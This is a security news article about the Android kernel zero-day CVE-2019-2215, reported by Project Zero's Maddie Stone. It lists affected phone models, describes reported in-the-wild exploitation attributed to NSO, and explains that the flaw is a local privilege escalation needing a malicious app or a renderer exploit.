The critical flaw that is exploited in the wild affects phone models from Samsung, Huawei, Pixel, and others
Google security researcher and Project Zero member Maddie Stone uncovered a critical zero-day vulnerability that impacts numerous Android phone models. The flaw, which was assigned a Common Vulnerabilities and Exposures number CVE-2019-2215, lies within Android's kernel code and could be used by attackers to escalate the privileges and root the device remotely.
In December 2017, older Android versions were patched, even before the CVE number was provided to the flaw. However, Stone now found evidence that the vulnerability impacts newer OS versions on at least 18 Android phone brands, including Samsung, Xiaomi, Huawei, Pixel, Moto, LG, and others.
The researcher also mentioned in her report that the infamous spying group NSO is actively exploiting the vulnerability in the wild – the organization is known to be hunting zero-days, exploiting them, and then selling the gathered information to governments.
The publication about the exploit was announced on October 4, just seven days after it was reported to the Android security research team.
The vulnerability was patched in older operating systems but still affects Android kernel versions released after April 2018
The two and half-year-old patch only applied to Android versions 3.18, 4.14, 4.4 and 4.9 fixed the flaw at the time. However, Stone said that many users running the most updated version of Android are still vulnerable. In particular, the following models that are running Android 8.x and later, are affected:
- Pixel 2 with Android 9 and Android 10 preview
- Huawei P20
- Xiaomi Redmi 5A
- Xiaomi Redmi Note 5
- Xiaomi A1
- Oppo A3
- Moto Z3
- Oreo LG phones
- Samsung S7, S8, S9
Luckily to Pixel 3, 3 XL, and 3a users, the vulnerability does not touch these versions of the operating system. While the researcher said that “exploit requires little or no per-device customization,” which means that it should be usable on multiple other phones, there is currently no evidence that other devices are affected by the flaw.
Potential victims need to install a malicious application for the exploit to work
As Maddie Stone pointed out, for the vulnerability to work, users need to install a malicious application first. Alternatively, the bug needs to be combined with another Chrome rendering exploit to be abused via the browser, for example. Therefore, while CVE-2019-2215 is considered to be a critical flaw, it is not a remote code execution one, which requires no user interaction to function. The researcher stated in the Chromium blog:
The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.
I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215. I’ve also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019
Google said that the update would be available in the upcoming days. Nevertheless, the flaw, as of now, is still exploitable in the wild. Therefore, if you are an owner of one of the vulnerable devices, you need to be extremely careful before the patch is released and avoid any apps from unofficial sources.